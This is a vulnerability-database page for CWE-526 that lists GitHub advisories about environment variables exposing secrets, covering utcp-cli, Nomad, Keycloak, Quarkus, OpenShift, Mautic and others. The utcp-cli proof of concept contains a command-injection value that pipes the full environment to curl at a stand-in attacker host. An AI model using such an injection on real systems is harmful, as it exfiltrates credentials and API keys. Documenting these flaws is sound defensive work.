Common Weakness Enumeration

CWE-526

Allowed

Cleartext Storage of Sensitive Information in an Environment Variable

Abstraction: Variant · Status: Incomplete

The product uses an environment variable to store unencrypted sensitive information.

37 vulnerabilities reference this CWE, most recent first.

GHSA-5V57-8RXJ-3P2R

Vulnerability from github – Published: 2026-05-14 20:56 – Updated: 2026-05-15 23:47
VLAI
Summary
python-utcp: Full Process Environment Exposed to CLI Subprocess - Secrets Leakage via Command Injection
Details

Summary

_prepare_environment() in cli_communication_protocol.py passes a full copy of os.environ to every CLI subprocess. When combined with the Command Injection vulnerability (CWE-78) in _substitute_utcp_args() tracked as GHSA-33p6-5jxp-p3x4, an attacker can exfiltrate all process-level secrets in a single tool call.

Vulnerable Code

# cli_communication_protocol.py
def _prepare_environment(self, provider: CliCallTemplate) -> Dict[str, str]:
    env = os.environ.copy()        # All secrets inherited
    if provider.env_vars:
        env.update(provider.env_vars)
    return env

Impact

Any environment variable present in the host process is accessible to injected commands. In typical AI agent deployments this includes:

  • Cloud provider credentials (AWS_SECRET_ACCESS_KEY, AZURE_CLIENT_SECRET)
  • Database connection strings (DATABASE_URL)
  • LLM API keys (OPENAI_API_KEY, ANTHROPIC_API_KEY)
  • Internal service tokens

Proof of Concept

# Tool defined as:
{"command": "grep UTCP_ARG_pattern_UTCP_END logfile.txt"}

# Attacker supplies:
tool_args = {"pattern": "x; env | curl -s -d @- https://attacker.com"}

# Executed bash script:
# CMD_0_OUTPUT=$(grep x; env | curl -s -d @- https://attacker.com 2>&1)
# -> Full env dump sent to attacker including all secrets

Patched

Fixed in utcp-cli 1.1.2. _prepare_environment no longer copies the full host environment. Inheritance is controlled by a new CliCallTemplate.inherit_env_vars field:

  • null (default): a small built-in OS-specific allowlist (PATH, HOME, LANG on Unix; PATH, PATHEXT, SYSTEMROOT, USERPROFILE, etc. on Windows) is inherited so shells and binaries continue to work.
  • []: strict mode -- nothing from the host environment reaches the subprocess; only env_vars is propagated.
  • ["FOO", "BAR"]: exactly those host variables are inherited (replaces, not merges with, the default allowlist).

env_vars is always layered on top and overrides any inherited value. Secrets like OPENAI_API_KEY no longer reach the subprocess unless the call template explicitly opts them in.

Mitigation

Upgrade to utcp-cli >= 1.1.2. There is no workaround in earlier versions short of stripping secrets from the host process before any CLI tool call.

Credit

Reported by @ZeroXJacks.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.1.1"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "utcp-cli"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.1.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-45370"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-526"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-14T20:56:07Z",
    "nvd_published_at": "2026-05-14T21:16:48Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\n`_prepare_environment()` in `cli_communication_protocol.py` passes a full copy of `os.environ` to every CLI subprocess. When combined with the Command Injection vulnerability (CWE-78) in `_substitute_utcp_args()` tracked as GHSA-33p6-5jxp-p3x4, an attacker can exfiltrate all process-level secrets in a single tool call.\n\n## Vulnerable Code\n\n```python\n# cli_communication_protocol.py\ndef _prepare_environment(self, provider: CliCallTemplate) -\u003e Dict[str, str]:\n    env = os.environ.copy()        # All secrets inherited\n    if provider.env_vars:\n        env.update(provider.env_vars)\n    return env\n```\n\n## Impact\n\nAny environment variable present in the host process is accessible to injected commands. In typical AI agent deployments this includes:\n\n- Cloud provider credentials (AWS_SECRET_ACCESS_KEY, AZURE_CLIENT_SECRET)\n- Database connection strings (DATABASE_URL)\n- LLM API keys (OPENAI_API_KEY, ANTHROPIC_API_KEY)\n- Internal service tokens\n\n## Proof of Concept\n\n```python\n# Tool defined as:\n{\"command\": \"grep UTCP_ARG_pattern_UTCP_END logfile.txt\"}\n\n# Attacker supplies:\ntool_args = {\"pattern\": \"x; env | curl -s -d @- https://attacker.com\"}\n\n# Executed bash script:\n# CMD_0_OUTPUT=$(grep x; env | curl -s -d @- https://attacker.com 2\u003e\u00261)\n# -\u003e Full env dump sent to attacker including all secrets\n```\n\n## Patched\n\nFixed in `utcp-cli` 1.1.2. `_prepare_environment` no longer copies the full host environment. Inheritance is controlled by a new `CliCallTemplate.inherit_env_vars` field:\n\n- `null` (default): a small built-in OS-specific allowlist (`PATH`, `HOME`, `LANG` on Unix; `PATH`, `PATHEXT`, `SYSTEMROOT`, `USERPROFILE`, etc. on Windows) is inherited so shells and binaries continue to work.\n- `[]`: strict mode -- nothing from the host environment reaches the subprocess; only `env_vars` is propagated.\n- `[\"FOO\", \"BAR\"]`: exactly those host variables are inherited (replaces, not merges with, the default allowlist).\n\n`env_vars` is always layered on top and overrides any inherited value. Secrets like `OPENAI_API_KEY` no longer reach the subprocess unless the call template explicitly opts them in.\n\n## Mitigation\n\nUpgrade to `utcp-cli \u003e= 1.1.2`. There is no workaround in earlier versions short of stripping secrets from the host process before any CLI tool call.\n\n## Credit\n\nReported by @ZeroXJacks.",
  "id": "GHSA-5v57-8rxj-3p2r",
  "modified": "2026-05-15T23:47:02Z",
  "published": "2026-05-14T20:56:07Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/universal-tool-calling-protocol/python-utcp/security/advisories/GHSA-5v57-8rxj-3p2r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45370"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/universal-tool-calling-protocol/python-utcp"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "python-utcp: Full Process Environment Exposed to CLI Subprocess - Secrets Leakage via Command Injection"
}

GHSA-6HV3-7C34-4HX8

Vulnerability from github – Published: 2022-02-15 01:57 – Updated: 2023-04-17 19:21
VLAI
Summary
Hashicorp Nomad Information Exposure Through Environmental Variables
Details

In Nomad before version 0.9.5, when rendering a task template, all environment variables were available to the rendering task. As a fix, only task environment variables are used.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/hashicorp/nomad"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2019-14802"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-526"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-05-12T17:59:46Z",
    "nvd_published_at": "2022-12-26T21:15:00Z",
    "severity": "MODERATE"
  },
  "details": "In Nomad before version 0.9.5, when rendering a task template, all environment variables were available to the rendering task.  As a fix, only task environment variables are used.",
  "id": "GHSA-6hv3-7c34-4hx8",
  "modified": "2023-04-17T19:21:09Z",
  "published": "2022-02-15T01:57:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-14802"
    },
    {
      "type": "WEB",
      "url": "https://github.com/hashicorp/nomad/pull/6055"
    },
    {
      "type": "WEB",
      "url": "https://github.com/hashicorp/nomad/commit/e8238305ef0b9ef37be3efd86a8d34bfbed5f63f"
    },
    {
      "type": "WEB",
      "url": "https://advisories.gitlab.com/advisory/advgo_github_com_hashicorp_nomad_client_allocrunner_taskrunner_template_GMS_2022_818.html"
    },
    {
      "type": "WEB",
      "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14802"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/hashicorp/nomad"
    },
    {
      "type": "WEB",
      "url": "https://github.com/hashicorp/nomad/releases/tag/v0.9.5"
    },
    {
      "type": "WEB",
      "url": "https://www.hashicorp.com/blog/category/nomad"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Hashicorp Nomad Information Exposure Through Environmental Variables"
}

GHSA-6RG8-WQVX-GHG5

Vulnerability from github – Published: 2025-03-10 15:30 – Updated: 2026-06-01 15:30
VLAI
Details

Cleartext Storage of Sensitive Information in an Environment Variable, Weak Password Recovery Mechanism for Forgotten Password vulnerability in Tapandsign Technologies Tap&Sign App allows Password Recovery Exploitation, Functionality Misuse.This issue affects Tap&Sign App: before V.1.025.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-12604"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-312",
      "CWE-526"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-10T15:15:36Z",
    "severity": "HIGH"
  },
  "details": "Cleartext Storage of Sensitive Information in an Environment Variable, Weak Password Recovery Mechanism for Forgotten Password vulnerability in Tapandsign Technologies Tap\u0026Sign App allows Password Recovery Exploitation, Functionality Misuse.This issue affects Tap\u0026Sign App: before V.1.025.",
  "id": "GHSA-6rg8-wqvx-ghg5",
  "modified": "2026-06-01T15:30:32Z",
  "published": "2025-03-10T15:30:48Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-12604"
    },
    {
      "type": "WEB",
      "url": "https://docs.tapandsign.com/tap-and-sign/tap-and-sign-v.1.025-surum-notlari"
    },
    {
      "type": "WEB",
      "url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0063"
    },
    {
      "type": "WEB",
      "url": "https://www.usom.gov.tr/bildirim/tr-25-0063"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-8HXP-QMPH-W5GQ

Vulnerability from github – Published: 2025-10-08 23:32 – Updated: 2025-10-10 14:03
VLAI
Summary
Keycloak Potential Variable Reference in Model Storage Services
Details

A flaw was found in org.keycloak/keycloak-model-storage-service. The KeycloakRealmImport custom resource substitutes placeholders within imported realm documents, potentially referencing environment variables. This substitution process allows for injection attacks when crafted realm documents are processed. An attacker can leverage this to inject malicious content during the realm import procedure. This can lead to unintended consequences within the Keycloak environment.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c 26.2.9"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "org.keycloak:keycloak-model-storage-services"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.keycloak:keycloak-model-storage-services"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "26.3.0"
            },
            {
              "fixed": "26.3.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-9162"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-526"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-08T23:32:36Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "A flaw was found in org.keycloak/keycloak-model-storage-service. The `KeycloakRealmImport` custom resource substitutes placeholders within imported realm documents, potentially referencing environment variables. This substitution process allows for injection attacks when crafted realm documents are processed. An attacker can leverage this to inject malicious content during the realm import procedure. This can lead to unintended consequences within the Keycloak environment.",
  "id": "GHSA-8hxp-qmph-w5gq",
  "modified": "2025-10-10T14:03:37Z",
  "published": "2025-10-08T23:32:36Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/keycloak/keycloak/security/advisories/GHSA-8hxp-qmph-w5gq"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:15336"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:15337"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:15338"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:15339"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:16399"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:16400"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2025-9162"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2389396"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/keycloak/keycloak"
    },
    {
      "type": "WEB",
      "url": "https://github.com/keycloak/keycloak/blob/26.3.3/model/storage-services/src/main/java/org/keycloak/exportimport/AbstractFileBasedImportProvider.java#L36"
    },
    {
      "type": "WEB",
      "url": "https://github.com/keycloak/keycloak/blob/75afda410495a9576e00edc3277ab42ca155f806/model/storage-services/src/main/java/org/keycloak/exportimport/AbstractFileBasedImportProvider.java#L35"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Keycloak Potential Variable Reference in Model Storage Services"
}

GHSA-CC73-99RJ-C7FH

Vulnerability from github – Published: 2024-05-01 00:31 – Updated: 2024-06-19 18:31
VLAI
Details

An information disclosure flaw was found in OpenShift's internal image registry operator. AZURE_CLIENT_SECRET can be exposed through an environment variable defined in the pod definition, but is limited to Azure environments. An attacker controlling an account that has high enough permissions to obtain pod information from the openshift-image-registry namespace could use this obtained client secret to perform actions as the registry operator's Azure service account.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-4369"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-526"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-05-01T00:15:06Z",
    "severity": "MODERATE"
  },
  "details": "An information disclosure flaw was found in OpenShift\u0027s internal image registry operator. AZURE_CLIENT_SECRET can be exposed through an environment variable defined in the pod definition, but is limited to Azure environments. An attacker controlling an account that has high enough permissions to obtain pod information from the openshift-image-registry namespace could use this obtained client secret to perform actions as the registry operator\u0027s Azure service account.",
  "id": "GHSA-cc73-99rj-c7fh",
  "modified": "2024-06-19T18:31:07Z",
  "published": "2024-05-01T00:31:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-4369"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2024:3881"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2024:3889"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2024-4369"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2278035"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F4V7-3MWW-9GC2

Vulnerability from github – Published: 2025-01-13 16:58 – Updated: 2025-01-14 16:38
VLAI
Summary
Keycloak allows unrestricted admin use of system and environment variables
Details

A security vulnerability has been identified that allows admin users to access sensitive server environment variables and system properties through user-configurable URLs. Specifically, when configuring backchannel logout URLs or admin URLs, admin users can include placeholders like ${env.VARNAME} or ${PROPNAME}. The server replaces these placeholders with the actual values of environment variables or system properties during URL processing.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.keycloak:keycloak-quarkus-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "26.0.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-11736"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-526"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-01-13T16:58:08Z",
    "nvd_published_at": "2025-01-14T09:15:20Z",
    "severity": "MODERATE"
  },
  "details": "A security vulnerability has been identified that allows admin users to access sensitive server environment variables and system properties through user-configurable URLs. Specifically, when configuring backchannel logout URLs or admin URLs, admin users can include placeholders like ${env.VARNAME} or ${PROPNAME}. The server replaces these placeholders with the actual values of environment variables or system properties during URL processing.\n\n",
  "id": "GHSA-f4v7-3mww-9gc2",
  "modified": "2025-01-14T16:38:41Z",
  "published": "2025-01-13T16:58:08Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/keycloak/keycloak/security/advisories/GHSA-f4v7-3mww-9gc2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-11736"
    },
    {
      "type": "WEB",
      "url": "https://github.com/keycloak/keycloak/commit/7a76858fe4aa39a39fb6b86dd3d2c113d9c59854"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:0299"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:0300"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2024-11736"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2328850"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/keycloak/keycloak"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Keycloak allows unrestricted admin use of system and environment variables"
}

GHSA-F8H5-V2VG-46RR

Vulnerability from github – Published: 2024-04-04 15:30 – Updated: 2024-12-13 00:30
VLAI
Summary
quarkus-core leaks local environment variables from Quarkus namespace during application's build
Details

A vulnerability was found in the quarkus-core component. Quarkus captures the local environment variables from the Quarkus namespace during the application's build. Thus, running the resulting application inherits the values captured at build time.

However, some local environment variables may have been set by the developer / CI environment for testing purposes, such as dropping the database during the application startup or trusting all TLS certificates to accept self-signed certificates. If these properties are configured using environment variables or the .env facility, they are captured into the built application. It may lead to dangerous behavior if the application does not override these values.

This behavior only happens for configuration properties from the quarkus.* namespace. So, application-specific properties are not captured.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.9.1"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "io.quarkus:quarkus-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.9.0.CR1"
            },
            {
              "fixed": "3.9.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.8.3"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "io.quarkus:quarkus-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.3.0.CR1"
            },
            {
              "fixed": "3.8.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.quarkus:quarkus-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.2.12.Final"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-2700"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-526"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-04-04T17:01:45Z",
    "nvd_published_at": "2024-04-04T14:15:09Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability was found in the quarkus-core component. Quarkus captures the local environment variables from the Quarkus namespace during the application\u0027s build. Thus, running the resulting application inherits the values captured at build time. \n\nHowever, some local environment variables may have been set by the developer / CI environment for testing purposes, such as dropping the database during the application startup or trusting all TLS certificates to accept self-signed certificates. If these properties are configured using environment variables or the .env facility, they are captured into the built application. It may lead to dangerous behavior if the application does not override these values.\n\nThis behavior only happens for configuration properties from the `quarkus.*` namespace. So, application-specific properties are not captured.",
  "id": "GHSA-f8h5-v2vg-46rr",
  "modified": "2024-12-13T00:30:50Z",
  "published": "2024-04-04T15:30:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2700"
    },
    {
      "type": "WEB",
      "url": "https://github.com/quarkusio/quarkus/issues/39927"
    },
    {
      "type": "WEB",
      "url": "https://github.com/quarkusio/quarkus/commit/2b24dc8dbc8f390c97428783d67614418676fc2e"
    },
    {
      "type": "WEB",
      "url": "https://github.com/quarkusio/quarkus/commit/91c3a58eaefe59e0afd430653d1636d664bd593f"
    },
    {
      "type": "WEB",
      "url": "https://github.com/quarkusio/quarkus/commit/990c3ee5dd5c689f514e5e87c221bce6d5dff267"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2024:11023"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2024:2106"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2024:2705"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2024:3527"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2024:4028"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2024:4873"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2024-2700"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2273281"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/quarkusio/quarkus"
    },
    {
      "type": "WEB",
      "url": "https://quarkus.io/blog/quarkus-3-2-12-final-released"
    },
    {
      "type": "WEB",
      "url": "https://quarkus.io/blog/quarkus-3-8-4-released"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "quarkus-core leaks local environment variables from Quarkus namespace during application\u0027s build"
}

GHSA-GWPF-2PC2-R92W

Vulnerability from github – Published: 2023-11-09 15:30 – Updated: 2023-11-09 15:30
VLAI
Details

A CWE-526: Exposure of Sensitive Information Through Environmental Variables vulnerability exists in Telit Cinterion BGS5, Telit Cinterion EHS5/6/8, Telit Cinterion PDS5/6/8, Telit Cinterion ELS61/81, Telit Cinterion PLS62 that could allow a local, low privileged attacker to get access to a sensitive data on the targeted system.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-47615"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-526"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-11-09T13:15:07Z",
    "severity": "LOW"
  },
  "details": "A CWE-526: Exposure of Sensitive Information Through Environmental Variables vulnerability exists in Telit Cinterion BGS5, Telit Cinterion EHS5/6/8, Telit Cinterion PDS5/6/8, Telit Cinterion ELS61/81, Telit Cinterion PLS62 that could allow a local, low privileged attacker to get access to a sensitive data on the targeted system.",
  "id": "GHSA-gwpf-2pc2-r92w",
  "modified": "2023-11-09T15:30:28Z",
  "published": "2023-11-09T15:30:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47615"
    },
    {
      "type": "WEB",
      "url": "https://ics-cert.kaspersky.com/advisories/2023/11/09/klcert-22-212-telit-cinterion-thales-gemalto-modules-exposure-of-sensitive-information-through-environmental-variables"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-H2WG-V8WG-JHXH

Vulnerability from github – Published: 2025-05-28 17:38 – Updated: 2025-05-28 20:07
VLAI
Summary
Mautic does not shield .env files from web traffic
Details

Summary

This advisory addresses a security vulnerability in Mautic where sensitive .env configuration files may be directly accessible via a web browser. This exposure could lead to the disclosure of sensitive information, including database credentials, API keys, and other critical system configurations.

Sensitive Information Disclosure via .env File Exposure: The .env file, which typically contains environment variables and sensitive application configurations, is directly accessible via a web browser due to missing web server configurations that restrict access to such files. This allows an unauthenticated attacker to view the contents of this file by simply navigating to its URL.

Mitigation

Update Mautic to the latest Mautic version. By default, Mautic does not use .env files for production data.

For Apache users: Ensure your web server is configured to respect .htaccess files.

For Nginx users: As Nginx does not inherently support .htaccess files, you must manually add a configuration block to your Nginx server configuration to deny access to .env files. Add the following to your Nginx configuration for the Mautic site:

location ~ /\.env {
    deny all;
}

After modifying your Nginx configuration, remember to reload or restart your Nginx service for the changes to take effect.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "mautic/core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.4.0"
            },
            {
              "fixed": "4.4.16"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "mautic/core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0-alpha"
            },
            {
              "fixed": "5.2.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "mautic/core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.0.0-alpha"
            },
            {
              "fixed": "6.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-47056"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-312",
      "CWE-526"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-05-28T17:38:38Z",
    "nvd_published_at": "2025-05-28T17:15:23Z",
    "severity": "MODERATE"
  },
  "details": "### Summary \nThis advisory addresses a security vulnerability in Mautic where sensitive `.env` configuration files may be directly accessible via a web browser. This exposure could lead to the disclosure of sensitive information, including database credentials, API keys, and other critical system configurations.\n\nSensitive Information Disclosure via `.env` File Exposure: The `.env` file, which typically contains environment variables and sensitive application configurations, is directly accessible via a web browser due to missing web server configurations that restrict access to such files. This allows an unauthenticated attacker to view the contents of this file by simply navigating to its URL.\n\n### Mitigation\nUpdate Mautic to the latest Mautic version.\nBy default, Mautic does not use `.env` files for production data.\n\n**For Apache users:** Ensure your web server is configured to respect `.htaccess` files.\n\n**For Nginx users:** As Nginx does not inherently support `.htaccess` files, you must manually add a configuration block to your Nginx server configuration to deny access to `.env` files. Add the following to your Nginx configuration for the Mautic site:\n\n```nginx\nlocation ~ /\\.env {\n    deny all;\n}\n```\n\nAfter modifying your Nginx configuration, remember to reload or restart your Nginx service for the changes to take effect.",
  "id": "GHSA-h2wg-v8wg-jhxh",
  "modified": "2025-05-28T20:07:50Z",
  "published": "2025-05-28T17:38:38Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mautic/mautic/security/advisories/GHSA-h2wg-v8wg-jhxh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47056"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mautic/mautic"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Mautic does not shield .env files from web traffic"
}

GHSA-P62Q-5483-H57V

Vulnerability from github – Published: 2023-11-15 15:30 – Updated: 2023-11-15 17:54
VLAI
Summary
Quarkus does not properly sanitize artifacts created from its use of the Gradle plugin, allowing certain build system information to remain
Details

A flaw was found in Quarkus, where it does not properly sanitize artifacts created using the Gradle plugin, allowing certain build system information to remain. This flaw allows an attacker to access potentially sensitive information from the build system within the application.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.quarkus:quarkus-project"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0.CR1"
            },
            {
              "last_affected": "3.5.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-5720"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-526"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-11-15T17:54:00Z",
    "nvd_published_at": "2023-11-15T14:15:07Z",
    "severity": "HIGH"
  },
  "details": "A flaw was found in Quarkus, where it does not properly sanitize artifacts created using the Gradle plugin, allowing certain build system information to remain. This flaw allows an attacker to access potentially sensitive information from the build system within the application.",
  "id": "GHSA-p62q-5483-h57v",
  "modified": "2023-11-15T17:54:00Z",
  "published": "2023-11-15T15:30:21Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5720"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2023-5720"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245700"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/quarkusio/quarkus"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Quarkus does not properly sanitize artifacts created from its use of the Gradle plugin, allowing certain build system information to remain"
}

Mitigation
Architecture and Design

